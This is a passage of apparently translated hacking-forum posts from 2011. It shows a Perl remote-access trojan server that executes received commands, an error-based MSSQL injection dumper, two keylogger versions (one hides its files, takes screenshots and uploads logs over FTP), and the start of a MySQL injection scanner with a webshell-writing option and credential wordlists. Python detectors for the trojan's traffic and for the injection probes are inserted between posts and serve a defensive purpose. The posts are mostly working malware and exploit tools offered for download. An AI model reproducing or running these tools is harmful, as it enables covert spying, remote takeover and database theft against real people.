    if (-f $todo) {
    print $con "FILEX".$_."FILEX"."\r\n";
    print "File : ".$_."\n";
    }

    if (-d $todo) {
    print $con "DIREX".$_."DIREX"."\r\n";
    print "Dir : ".$_."\n";
    }

    }
    }

    sub coleccionar {
    opendir DIR,$_[0];
    my @archivos = readdir DIR;
    close DIR;
    return @archivos;
    }

    if ($resultado=~/getcwd/ig) {
    print "envie ".getcwd()."\n\n";
    print $con getcwd()."\r\n";
    }


    if ($resultado=~/mostrarpro/ig) {


    my $new = Win32::Process::List->new(); 
    my %process = $new->GetProcesses();
    for my $pid (keys %process) {
    print $con "PROXEC".$process{$pid}."PROXEC\r\n";
    print $con "PIDX".$pid."PIDX\r\n";

    }


    }

    if ($resultado=~/crearnow K0BRA(.*)K0BRA ACATOY(.*)ACATOY/ig) {
    my $name = $1;
    my $file = $2;

    chomp $name;
    chomp $file;

    $name =~s/(\s)+$//;
    $file =~s/(\s)+$//;

    print "name is $name end\n";
    print "file is $file end\n";

    open FILE,">>".$name;
    print FILE $file."\n";
    close FILE;
    }

    if ($resultado=~/comando :(.*):/ig) {
    print "llego comando $1\n";
    print $resultado;
    my $temp = qx($1);
    print $con $temp."\r";
    }

    if ($resultado=~/iniciochau/g) {
    inicio_chau("Shell_TrayWnd");
    }
    if ($resultado=~/iniciovuelve/g) {
    inicio_vuelve("Shell_TrayWnd");
    } else {
    print $resultado;
    }
    if ($resultado=~/iconovuelve/g) {
    icono_vuelve("Program Manager");
    }
    if ($resultado=~/iconochau/g) {
    icono_chau("Program Manager");
    }


    sub icono_vuelve {
    $handle = $a->Call(0,$_[0]);
    $b->Call($handle,SW_SHOWNORMAL);

    }

    sub icono_chau {

    $handle = $a->Call(0,$_[0]);
    $b->Call($handle,SW_HIDE);

    }

    sub inicio_vuelve {
    $handlex = $a->Call($_[0],0);
    $b->Call($handlex,SW_SHOWNORMAL);

    }

    sub inicio_chau {

    $handlea = $a->Call($_[0],0);
    $b->Call($handlea,SW_HIDE);

    }


    }


    # ¿ The End ?



If you want to download it from sourceforge

Código: text

https://sourceforge.net/projects/nefaster/
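Added here as a defensive example, not code from the original post or the project: the Python below recognises Nefaster's command and reply formats, exactly as the server above dispatches them (one plaintext line per connection on TCP/666, arguments wrapped in K0BRA/ACATOY, replies wrapped in FILEX/DIREX/PROXEC/PIDX), in captured TCP segments and turns each one into an alert with the callback address or command pulled out. The capture, hosts and severity levels are constructed assumptions.

```python
import re

# Nefaster's server (above) listens on TCP/666. The client opens a new connection
# for every command, sends one plaintext line ending in "\r\n" and reads the reply,
# so one captured segment is normally one complete command or one answer.
NEFASTER_PORT = 666

# Client -> server commands, one regex per branch of the server's dispatch loop.
# Fields: command name, pattern, severity we assign, key for the captured argument.
COMMAND_SIGS = [
    ("backshell",  re.compile(r"^backshell :([^:\s]+):(\d+):"),             "critical", "callback"),
    ("comando",    re.compile(r"^comando :(.*):"),                           "critical", "shell_command"),
    ("crearnow",   re.compile(r"^crearnow K0BRA(.*)K0BRA ACATOY(.*)ACATOY"), "high",     "path"),
    ("borrarfile", re.compile(r"^borrarfile K0BRA(.*)K0BRA"),                "high",     "path"),
    ("borrardir",  re.compile(r"^borrardir K0BRA(.*)K0BRA"),                 "high",     "path"),
    ("chauproce",  re.compile(r"^chauproce K0BRA(.*)K0BRA(.*)K0BRA"),        "high",     "pid"),
    ("chdirnow",   re.compile(r"^chdirnow K0BRA(.*)K0BRA"),                  "medium",   "path"),
    ("dirnow",     re.compile(r"^dirnow ACATOY(.*?)(?:ACATOY)?$"),           "medium",   "path"),
    ("playmusic",  re.compile(r"^playmusic K0BRA(.*)K0BRA"),                 "low",      "path"),
    ("msgbox",     re.compile(r"^msgbox (.*)"),                              "low",      "text"),
]
# Commands that carry no argument, with the severity we assign them.
BARE_COMMANDS = {
    "infor": "medium", "getcwd": "medium", "porters": "medium", "mostrarpro": "medium",
    "iniciochau": "medium", "iconochau": "medium", "iniciovuelve": "low",
    "iconovuelve": "low", "pararmusic": "low", "opencd": "low", "closedcd": "low",
}
# Server -> client replies: the delimiters the client's regexes unwrap, plus the
# ":domain:chip:version:user:os:" answer to "infor".
REPLY_MARKERS = ("FILEX", "DIREX", "PROXEC", "PIDX")
INFO_REPLY = re.compile(r"^:[^:]*:[^:]*:[^:]*:[^:]*:[^:]*:")


def classify_payload(payload, to_server):
    """Classify one TCP segment. Returns a dict describing the Nefaster message,
    or None when the bytes do not look like this protocol."""
    line = payload.decode("latin-1").split("\r\n", 1)[0]
    if to_server:
        for name, pat, severity, label in COMMAND_SIGS:
            m = pat.match(line)
            if m:
                arg = ":".join(m.groups()) if name == "backshell" else m.group(1)
                return {"direction": "c2s", "command": name, "severity": severity, label: arg}
        cmd = line.strip()
        if cmd in BARE_COMMANDS:
            return {"direction": "c2s", "command": cmd, "severity": BARE_COMMANDS[cmd]}
        return None
    for marker in REPLY_MARKERS:
        if line.startswith(marker) and line.count(marker) >= 2:
            return {"direction": "s2c", "reply": marker, "severity": "medium"}
    if INFO_REPLY.match(line):
        return {"direction": "s2c", "reply": "infor", "severity": "medium"}
    return None


def scan_capture(records):
    """records: iterable of (src_ip, dst_ip, dst_port, src_port, payload).
    Returns an alert dict, tagged with both hosts, for every segment that matches."""
    alerts = []
    for src, dst, dport, sport, payload in records:
        if dport == NEFASTER_PORT:
            hit = classify_payload(payload, to_server=True)
        elif sport == NEFASTER_PORT:
            hit = classify_payload(payload, to_server=False)
        else:
            continue
        if hit:
            hit.update(src=src, dst=dst)
            alerts.append(hit)
    return alerts


# Constructed capture (not real traffic): 10.0.0.9 drives an infected 10.0.0.23.
SAMPLE_CAPTURE = [
    ("10.0.0.9",  "10.0.0.23", 666, 51000, b"infor\r\n"),
    ("10.0.0.23", "10.0.0.9",  51000, 666, b":WORKGROUP:x86:5.1:user:WinXP:\r\n"),
    ("10.0.0.9",  "10.0.0.23", 666, 51001, b"dirnow ACATOYC:/ACATOY\r\n"),
    ("10.0.0.23", "10.0.0.9",  51001, 666, b"DIREXWINDOWSDIREX\r\nFILEXboot.iniFILEX\r\n"),
    ("10.0.0.9",  "10.0.0.23", 666, 51002, b"comando :whoami:\r\n"),
    ("10.0.0.9",  "10.0.0.23", 666, 51003, b"backshell :10.0.0.9:4444:\r\n"),
    ("10.0.0.9",  "10.0.0.23", 666, 51004, b"GET / HTTP/1.0\r\n"),  # not Nefaster
]

if __name__ == "__main__":
    for alert in scan_capture(SAMPLE_CAPTURE):
        print(alert["severity"].upper(), alert)
```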
#341
Perl / [Perl] MSSQL T00l
Julio 03, 2011, 09:47:39 PM
Well, here I bring you a tool in perl to
find tables and columns with information_schema in MSSQL.
You can also extract the values you want from the columns.

Código: perl

#!/usr/bin/perl
#MSSQL T00l
#(C) Doddy Hackman 2011


use LWP::UserAgent;
use HTTP::Request::Common;

my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

sub head {
print q(

@@    @@   @@@@  @@@@   @@@    @@     @@@@@@  @@@      @@@    @@ 
@@@  @@@  @@  @ @@  @  @@@@@   @@       @@   @@@@@    @@@@@   @@ 
@@@  @@@  @@    @@    @@   @@  @@       @@  @@   @@  @@   @@  @@ 
@@@@@@@@@@  @@@   @@@  @@   @@  @@       @@  @@   @@  @@   @@  @@ 
@@ @@@@ @@    @@    @@ @@ @@@@  @@       @@  @@   @@  @@   @@  @@ 
@@  @@  @@ @  @@ @  @@  @@@@@   @@       @@   @@@@@    @@@@@   @@ 
@@  @@  @@ @@@@  @@@@    @@@@@  @@@@     @@    @@@      @@@    @@@@
                                                                 


);
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
<stdin>;
exit(1);
}

repe();

sub repe {

system("cls");


head();


print "\n\n[Page] : ";
chomp(my $page=<stdin>);

$code = toma($page);

if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) {
print "\n\n[+] The page is vulnerable to MSSQL Injection\n\n";
} else {
print "\n\n[-] Not vulnerable\n\n";
#copyright();
}

menu:

print q(

##################################

1 - Dump tables
2 - Dump Columns of the a table
3 - Dump values
4 - Change target
5 - Exit

##################################


);

print "[Opcion] : ";
chomp(my $op=<stdin>);

if ($op eq 1) {
print "\n\n[*] Dumping tables...\n\n";
mssql_tables($page);
goto menu;
}
elsif ($op eq 2) {
print "\n\n[Table] : ";
chomp (my $tab = <stdin>);
print "\n\n[*] Dumping columns..\n\n";
mssql_columns($page,$tab);
goto menu;
}
elsif($op eq 3) {
print "\n\n[Table] : ";
chomp (my $tab=<stdin>);
print "\n\n[Column] : ";
chomp(my $col=<stdin>);
print "\n\n[*] Dumping values..\n\n";
mssql_data($page,$tab,$col);
goto menu;
}
elsif ($op eq 4) {
repe();
}
elsif ($op eq 5) {
copyright();
}
else {
goto menu;
}

#@tables = mssql_tables("http://www.12manage.com/profile.asp?m=drarupbarman'","Users");


sub mssql_columns {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$_[1]."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Column found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}

sub mssql_tables {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Table found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}

sub mssql_data {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$_[2].$pass1."from".$pass1.$_[1].$pass1."where".$pass1.$_[2].$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Data found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}


sub toma {
return $nave->request(GET $_[0])->content;
}


# ¿ The End ?



If you want to download it from sourceforge

Code: text

https://sourceforge.net/projects/mssqltool/

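As an added defensive example (not code from the post or from the tool above), the following Python scans constructed Apache-style access log lines for the error-based `convert(int,(select top 1 ...))` probes this tool sends. It first undoes the separators that the tool's `bypass()` substitutes for spaces (`+`, `/**/`, `%20`), so a detector that looks for literal spaces is not evaded, and then reads the `NOT IN` list to report how far the enumeration has progressed.

```python
"""Detect error-based MSSQL enumeration probes in web-server access logs.

Added example for the MSSQL T00l post; the log lines below are constructed,
not real traffic.
"""
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines: three probes, two benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jul/2011:21:47:39 -0300] "GET /profile.asp?m=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('')))-- HTTP/1.1" 500 1823
10.0.0.5 - - [03/Jul/2011:21:47:41 -0300] "GET /profile.asp?m=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('','users')))-- HTTP/1.1" 500 1831
10.0.0.9 - - [03/Jul/2011:21:48:02 -0300] "GET /profile.asp?m=1/**/and/**/1=convert(int,(select/**/top/**/1/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='users'/**/and/**/column_name/**/not/**/in/**/('')))/* HTTP/1.1" 500 1840
10.0.0.7 - - [03/Jul/2011:21:49:00 -0300] "GET /profile.asp?m=drarupbarman HTTP/1.1" 200 5120
10.0.0.8 - - [03/Jul/2011:21:49:30 -0300] "GET /search.asp?q=convert%20to%20int HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# The tool wraps a scalar subquery in convert(int, ...) so the server leaks
# the value in a type-conversion error message.
CONVERT_PROBE = re.compile(
    r"convert\s*\(\s*int\s*,\s*\(\s*select\s+top\s+1\s+(\w+)\s+from\s+([\w.]+)"
)
NOT_IN_RE = re.compile(r"not in \(([^)]*)\)")

STAGES = {
    "information_schema.tables": "enumerating tables",
    "information_schema.columns": "enumerating columns",
}


def normalize(query: str) -> str:
    """Undo the space substitutes bypass() uses ('+', '%20', '/**/')."""
    decoded = unquote_plus(query)            # '+' and '%20' become ' '
    decoded = decoded.replace("/**/", " ")   # inline-comment separator
    decoded = re.sub(r"\s+", " ", decoded)
    return decoded.lower()


def classify_request(query: str):
    """Return a verdict dict for an enumeration probe, or None if benign."""
    norm = normalize(query)
    m = CONVERT_PROBE.search(norm)
    if not m:
        return None
    column, source = m.group(1), m.group(2)
    stage = STAGES.get(source, f"dumping {column} from {source}")
    # Every value already leaked is appended to the NOT IN list, so the
    # number of quoted entries beyond the initial '' shows the progress.
    already = 0
    seen = NOT_IN_RE.search(norm)
    if seen:
        already = max(0, seen.group(1).count("'") // 2 - 1)
    return {"stage": stage, "source": source, "already_extracted": already}


def scan_log(text: str):
    """Scan access-log text and return one hit per probing request."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = m.group(1).partition("?")[2]
        if not query:
            continue
        verdict = classify_request(query)
        if verdict:
            hits.append({"line": lineno, "ip": line.split(" ", 1)[0], **verdict})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A run of probes from one client whose `already_extracted` counter keeps increasing is the signature of the tool's `for (1..666)` loop and is a stronger alert than any single line.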
#342
Perl / [Perl] Manager
July 03, 2011, 09:47:26 PM
Well, here I bring you a program that will help you list all the
processes and close whichever one you want.
In this version you can have a graphical interface.


Code: perl

#!usr/bin/perl
#Manager (C) Doddy Hackman 2010
#Module necessary
#ppm install http://trouchelle.com/ppm/Win32-Process-List.ppd

use Win32::Process::List;
use Win32::Process;
use Tk;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

$new = MainWindow->new(-background=>"black");
$new->geometry("250x300+20+20");
$new->resizable(0,0);
$new->title("Manager 0.1");
$new->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Process")->pack();
my $lists = $new->Listbox(-background=>"black",-foreground=>"green")->place(-y=>"50",-x=>"60");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Close",-activebackground=>"green",-width=>"40",-command=>\&close)->place(-y=>"218");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Refresh",-width=>"40",-activebackground=>"green",-command=>\&refresh)->place(-y=>"240");
$new->Button(-background=>"black",-foreground=>"green",-text=>"About",-width=>"40",-activebackground=>"green",-command=>\&about)->place(-y=>"263");

&refresh;

MainLoop;


sub refresh {

my @pids;
my @procer;
my $limit;

$lists->delete(0.0,"end");

my $new = Win32::Process::List->new(); 
my %process = $new->GetProcesses();
my $limit = -1;
for my $pid (keys %process) {
$limit++;
push (@procer,$process{$pid});
push (@pids,$pid);
}
print "\n\n[+] ".int(@procer)."\n\n";
for my $n(0..$limit) {
print $procer[$n]."\n";
$lists->insert("end",$procer[$n]);
}


}

sub close {

$d = $lists->curselection();

for my $id (@$d) {

my $proceso = $lists->get($id);

my $pida = Win32::Process::List->new();
my @pid = $pida->GetProcessPid($proceso);

Win32::Process::KillProcess(@pid[1],$proceso);
sleep 3;
&refresh();
}
}



sub about {
$about = MainWindow->new(-background=>"black");
$about->title("About");
$about->geometry("150x100+20+20");
$about->resizable(0,0);
$about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Coded By Doddy H")->pack();
$about->Label(-background=>"black",-foreground=>"green")->pack();
$about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"2011")->pack();
}



# ¿ The End ?



If you want to download it from sourceforge

Code: text

https://sourceforge.net/projects/managerx/

#343
Perl / [Perl] Keycagator 0.7
July 03, 2011, 09:47:14 PM
Hello everyone, here I bring you the new version of this keylogger.
In this version it is already acceptable, with the following options:

  • Captures letters, recognizing uppercase and lowercase
  • Captures the windows being worked in
  • Takes screenshots of the system every 1 minute
  • Uploads logs and captured screenshots via FTP
  • Hides traces

    Code: perl

    #!usr/bin/perl
    #KeyCagator 0.7 (C) Doddy Hackman 2011
    #

    use Win32::API;
    use Win32::GuiTest qw(GetForegroundWindow GetWindowText FindWindowLike SetForegroundWindow SendKeys);
    use Win32::Clipboard;
    use threads;
    use Net::FTP;
    use Win32::File;
    use Cwd;

    my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I");
    my $tengo = 0;

    #if ($^O eq 'MSWin32') {
    #use Win32::Console;
    #Win32::Console::Free();
    #}

    hideit($0,"hide");

    subirftp("logs.txt","logs.txt");

    my $comando1 = threads->new(\&capture_windows);
    my $comando2 = threads->new(\&capture_keys);
    my $comando3 = threads->new(\&capture_screen);

    $comando1->join();
    $comando2->join();
    $comando3->join();


    sub capture_windows {

    while(1) {

    my $win1 = GetForegroundWindow();         
    my $win2 = GetForegroundWindow();

    if($win1 != $win2){
    my $nombre = GetWindowText($win1);
    chomp($nombre);
    if ($nombre ne "") {
    #print "\n\n[".$nombre."]\n\n";
    savefile("logs.txt","\n\n[".$nombre."]\n\n");
    }
    }
    }
    return 1;
    }

    sub capture_keys {

    while(1) {

    my $test1;
    my $test2;

    for my $num(0x30..0x39) { #Numbers

    if (dame($num)) {
    #print "number : ".chr($num)."\n";
    savefile("logs.txt",chr($num));
    }
    }

    if (dame(0x14)) {
    $test1 = 1;
    $tengo++;
    }

    for my $num(0x41..0x5A) { #Words

    if (dame($num)) {

    if (dame(0x20)) {
    savefile("logs.txt"," ");
    }

    if (dame(0x32)) {
    savefile("logs.txt","\n[enter]\n\n");
    }

    unless (verpar($tengo) eq 1) {
    #print "MAYUSCULA : ".chr($num)."\n";
    savefile("logs.txt",chr($num));
    }

    if (dame(0x10) or dame(0xA0) or dame(0xA1)) {
    #print "MAYUSCULA : ".chr($num)."\n";
    $test2 = 1;
    }

    unless ($test1 eq 1 or $test2 eq 1) {
    if ($num >= 0x41) {
    if ($num <= 0x5A) {
    if (verpar($tengo) eq 1) {
    #print "MINUSCULA : ".chr($num+32)."\n";
    savefile("logs.txt",chr($num+32));
    }
    }
    }
    }
    }
    }
    }
    return 1;
    }

    sub capture_screen {

    $numero = 0;

    while(1) {

    sleep 60;

    $numero++;

    SetForegroundWindow(1);
    SendKeys('%{PRTSCR}');

    my $a = Win32::Clipboard::GetBitmap();

    open (FOTO,">".$numero.".bmp");
    binmode(FOTO);
    print FOTO $a;
    close FOTO;

    hideit($numero.".bmp","hide");
    subirftp($numero.".bmp",$numero.".bmp");
    }
    }

    sub dame {
    return($come->Call(@_) & 1);
    }

    sub savefile {

    open (SAVE,">>".$_[0]);
    print SAVE $_[1];
    close SAVE;

    hideit($_[0],"hide");

    }

    sub hideit {
    if ($_[1] eq "show") {
    Win32::File::SetAttributes($_[0],NORMAL);
    }
    elsif ($_[1] eq "hide") {
    Win32::File::SetAttributes($_[0],HIDDEN);
    }
    else {
    print "error\n";
    }
    }

    sub subirftp {

    if ($ser = Net::FTP->new("localhost")) {
    if ($ser->login("doddy","123")) {
    print "subi".getcwd()."/".$_[0]."\n";
    if ($ser->put(getcwd()."/".$_[0],$_[1])) {
    return true;
    }
    }
    $ser->close;
    }


    }

    sub verpar{
    return ($_[0] % 2 == 0) ? "1" : "2";
    }


    #Credits : to explorer for helpme with the function verpar()
    #Mail : lepuke[at]hotmail[com]
    #Blog : doddy-hackman.blogspot.com
    # ¿ The End ?
#344
Perl / [Perl] KeyCagator 0.4
July 03, 2011, 09:46:58 PM
Well, this is a keylogger in Perl that I made with the following options:

* Captures keys, recognizing uppercase and lowercase
* Shows the windows being worked in

Few options, but better than the previous version

Code: perl

#!usr/bin/perl
#KeyCagator 0.4 (C) Doddy Hackman 2010
#

use Win32::API;
use Win32::GuiTest qw(GetForegroundWindow GetWindowText);

my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I");
my $tengo = 0;

if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

while (true) {

capture_windows();
capture_keys();

}

sub capture_windows {

my $win1 = GetForegroundWindow();         
my $win2 = GetForegroundWindow();

if($win1 != $win2){
my $nombre = GetWindowText($win1);
chomp($nombre);
if ($nombre ne "") {
#print "\n\n[".$nombre."]\n\n";
savefile("logs.txt","\n\n[".$nombre."]\n\n");
}
}

}

sub capture_keys {

my $test1;
my $test2;


capture_windows();

for my $num(0x30..0x39) { #Numbers

capture_windows();

if (dame($num)) {
#print "number : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}
}

if (dame(0x14)) {
$test1 = 1;
$tengo++;
}

for my $num(0x41..0x5A) { #Words


capture_windows();

if (dame($num)) {


if (dame(0x0d)) {
savefile("logs.txt","\n\n[enter]\n\n");
}

unless (verpar($tengo) eq 1) {
#print "MAYUSCULA : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}

if (dame(0x10) or dame(0xA0) or dame(0xA1)) {
#print "MAYUSCULA : ".chr($num)."\n";
$test2 = 1;
}

unless ($test1 eq 1 or $test2 eq 1) {
if ($num >= 0x41) {
if ($num <= 0x5A) {
if (verpar($tengo) eq 1) {
#print "MINUSCULA : ".chr($num+32)."\n";
savefile("logs.txt",chr($num+32));
}
}
}
}
}
}

}

sub dame {
return($come->Call(@_) & 1);
}

sub savefile {
open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE;
}

sub verpar{
return ($_[0] % 2 == 0) ? "1" : "2";
}


#Credits : to explorer for helpme with the function verpar()
#Mail : lepuke[at]hotmail[com]
#Blog : doddy-hackman.blogspot.com
# ¿ The End ?


If you want to download it from sourceforge

Code: text

https://sourceforge.net/projects/keycagator/
#345
Perl / [Perl] K0bra 0.5
July 03, 2011, 09:46:20 PM
Well, this is the new version of an SQLi scanner I had made;
I fixed several errors and added some things

Code: perl

#!usr/bin/perl
#k0bra 0.5
#Automatic SQL Scanner for MYSQL
#(c)0ded By Doddy H
#
#
#C:\Users\DoddyH>perl k0bra.pl http://127.0.0.1/sql.php?id= --
#
#
#
#
# @      @@   @
#@@     @  @ @@
# @ @@  @  @  @ @   @ @ @@@
# @ @   @  @  @@ @ @@@ @  @
# @@    @  @  @  @  @   @@@
# @ @   @  @  @  @  @  @  @
#@@@ @   @@   @@@  @@@ @@@@@
#
#
#
#
#[Status] : Scanning.....
#[Status] : Enjoy the menu
#
#[Target confirmed] : http://127.0.0.1/sql.php?id=-1+union+select+hackman,2,3
#[Bypass] : --
#
#
#
#--== information_schema.tables ==--
#
#[1] : Show tables
#[2] : Show columns
#[3] : Show DBS
#[4] : Show tables witg other DB
#[5] : Show columns with other DB
#
#
#--== mysql.user ==--
#
#[6] : Show users
#
#
#--== Others ==--
#
#[7] : Fuzzing tables
#[8] : Fuzzing columns
#[9] : Fuzzing files with load_file
#[10] : Dump
#[11] : Informacion of the server
#[12] : Create a shell with into outfile
#[13] : Show Log
#[14] : Exit
#
#
#[Option] : Enjoy this program xDDDDD
#

system('cls');
system ("title k0bra");



@buscar1 =('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users','name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios','miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores','administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user','user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name','member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre','user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth','e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head','tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente','sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos','tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','curso','membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead','associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users','tuser','tusers','utilisateurs','amministratore','god','God','authors','wp_users','tb_usuarios','asociado','asociados','autores','autor','Users','Admin','Members','tb_usuario','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO','USR_NAME','about','access','admin_id','admin_name','a
dmin_pass','admin_passwd','admin_password','admin_pwd','admin_user','admin_userid','admin_username','adminemail','adminid','administrator_name','adminlogin','adminmail','adminname','adminuser','adminuserid','adminusername','aid','aim','apwd','auid','authenticate','authentication','blog','cc_expires','cc_number','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','contact','converge_pass_hash','converge_pass_salt','crack','customers_email_address','customers_password','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e_mail','emer','emni','emniplote','emri','fjalekalimi','fjalekalimin','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id','id_group','id_member','images','ime','index','ip_address','kodi','korisnici','korisnik','kpro_user','last_ip','last_login','lastname','llogaria','login_admin','login_name','login_pass','login_passwd','login_password','login_pw','login_pwd','login_user','login_username','logini','loginkey','loginout','logo','logohu','lozinka','md5hash','mem_login','mem_pass','mem_passwd','mem_password','mem_pwd','member_id','member_login_key','member_name','memberid','memlogin','mempassword','my_email','my_name','my_password','my_username','myname','mypassword','myusername','nc','new','news','number','nummer','p_assword','p_word','pass_hash','pass_w','pass_word','pass1word','passw','passwordsalt','passwort','passwrd','perdorimi','perdoruesi','personal_key','phone','privacy','psw','punetoret','punonjes','pword','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','sifra','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','uid','uname','user_admin','user_icq','user_id','user_ip','user_level','user_login','user_n','user_pass','user_passw','user_passwd','user_pw','user_pwd','us
er_pword','user_pwrd','user_un','user_uname','user_username','user_usernm','user_usernun','user_usrnm','user1','useradmin','userid','userip','userlogin','usern','usernm','userpass','userpassword','userpw','userpwd','usr_n','usr_name','usr_pass','usr2','usrn','usrnam','usrname','usrnm','usrpass','warez','xar_name','xar_pass','nom dutilisateur','mot de passe','compte','comptes','aide','objectif','authentifier','authentification','Contact','fissure','client','clients','de donn?es','mot_de_passe_bdd','t?l?charger','E-mail','adresse e-mail','Emer','complet','groupe','hachage','Page daccueil','Kodi','nom','connexion','membre','MEMBERNAME','mon_mot_de_passe','monmotdepasse','ignatiusj','caroline-du-nord','nouveau','Nick','passer','Passw','Mot de passe','t?l?phone','protection de la vie priv?e','PSW','pWord','sel','recherche','de s?rie','param?tre','?tat','stocker','texte','cvvnumber');

@buscar2 = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente','usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario','login_id','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username','sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave','membername','nme','unme','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password','userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username','tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','ÃÜÂë','aut','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images',
